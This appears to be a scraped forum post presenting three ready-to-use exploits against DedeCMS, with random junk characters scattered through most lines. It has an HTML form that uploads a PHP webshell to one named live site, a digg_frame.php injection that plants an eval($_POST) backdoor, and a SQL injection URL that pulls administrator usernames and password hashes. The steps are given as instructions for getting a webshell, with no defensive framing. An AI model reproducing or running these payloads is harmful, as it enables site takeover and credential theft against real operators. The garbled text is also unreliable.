<html>2 d3 z/ ?+ `7 N4 b
<head>
6 m5 E- P% k% \/ o2 x<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>2 e( n& s. ~" Q; y7 J
</head>+ i4 q* _: \. T+ y! a0 F7 @& ~% R
<body style="FONT-SIZE: 9pt">
. D; s) a% @; p* ]---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
+ `& A, {3 a1 j6 u7 y* n<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
1 ?, c$ n1 B- r6 n/ f- ?<input type='hidden' name='activepath' value='/data/cache/' />: T D+ C( P4 P& w$ A" R' X0 |
<input type='hidden' name='cfg_basedir' value='../../' />" R# d! I- u6 I: @+ E+ R
<input type='hidden' name='cfg_imgtype' value='php' />
1 ?" s$ l, e/ l0 S. J. ]<input type='hidden' name='cfg_not_allowall' value='txt' />( Z3 `/ d3 r4 |2 T: n8 [0 d
<input type='hidden' name='cfg_softtype' value='php' />9 X# O6 u) E, w5 s' @# b2 J' Z
<input type='hidden' name='cfg_mediatype' value='php' />
* F9 M2 b( a: x8 d! o<input type='hidden' name='f' value='form1.enclosure' />- e8 U5 P9 W, v
<input type='hidden' name='job' value='upload' />
# d& P! C! Y2 o% J9 f# |" Y<input type='hidden' name='newname' value='fly.php' />3 I- y1 T* f8 Z
Select U Shell <input type='file' name='uploadfile' size='25' />: Z$ c) T9 k- g+ b n) w$ R5 [# o2 t
<input type='submit' name='sb1' value='确定' />. O: X; X& r, n: f3 P/ q7 V
</form>- n0 ]4 l4 q5 x
<br />It's just a exp for the bug of Dedecms V55...<br />
2 \1 d, R, i# f0 w3 m- [) Q, aNeed register_globals = on...<br />
" w- c$ W$ f! e4 T; MFun the game,get a webshell at /data/cache/fly.php...<br />
9 t3 t2 d: l) Q" J, }; r$ [</body>6 W8 q9 @" j1 }
</html>) H- r' c4 Y8 S. i9 d4 M+ h! s3 q
! o4 U1 W& |- }* C
, }5 A% @2 ], E/ h0 e4 v9 e& w7 m- [) w6 i7 f+ w, z: s. ~
2 _) H+ E8 L0 L3 H
: O4 M' c# L5 W6 v% j% `- `* T* y* D2 d" J# ~( f/ h
0 Z; Q4 \/ Q3 {7 p% P Q
/ h* E+ J5 {$ i
& U+ i3 U5 X& `/ U @9 e2 o4 l8 I! Z. i$ Q$ h2 m8 H
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
* a+ K7 Z" i0 V* H9 K6 J利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
5 n) k& m# U2 Q: {. P# Z1. 访问网址:) G+ ~) e. E2 F |" f' c3 n- h
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
1 w& |3 ~9 h! S0 I+ T: g可看见错误信息
- {% Q& S1 `3 f: Z7 W6 n2 B9 @
& i7 K: g& `: A) F! l/ Q! i4 T" i% g# m |5 L- z" n
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。4 K2 x V% j; |6 H
int(3) Error: Illegal double '1024e1024' value found during parsing7 D1 ~8 v0 f' Q) E% s7 t' i
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
& N* `: Y& d8 k( f0 d @1 X/ R" @
: a3 C5 I+ Z H8 G8 Q4 Y3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
& W( X: u4 Z2 `' u+ r% _7 ?1 }' h: v' T) @" [
, `9 Z* _. _( z, }<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>; O3 w. q! v I0 d2 |. ?
3 a5 U( ]5 h+ n9 u3 g
( G8 U/ H4 B* K1 u1 {& s按确定后的看到第2步骤的信息表示文件木马上传成功.
# `$ [1 M& g4 L- y9 v% y, F
7 w2 `& y: q- F+ W
! b8 [* i4 R% U/ G( @$ [0 y6 g* V
, T* k- {# K& Z
- H$ X; z# t! t
/ k$ c6 |( t D
6 R# |, I; M. K0 a* R, }$ w8 M1 j. ^* S0 `* V+ X7 U2 V7 o
7 \6 ?+ W- X0 B4 \+ F# |4 c3 N8 _
5 {0 h) c! O* |- _: ?6 m7 N2 E6 M2 n/ F' F
% M* N$ O& b4 S
3 q: K/ `% z/ \4 r织梦(DedeCms)plus/infosearch.php 文件注入漏洞
% F4 V( ?2 ?# bhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
分享
支持
反对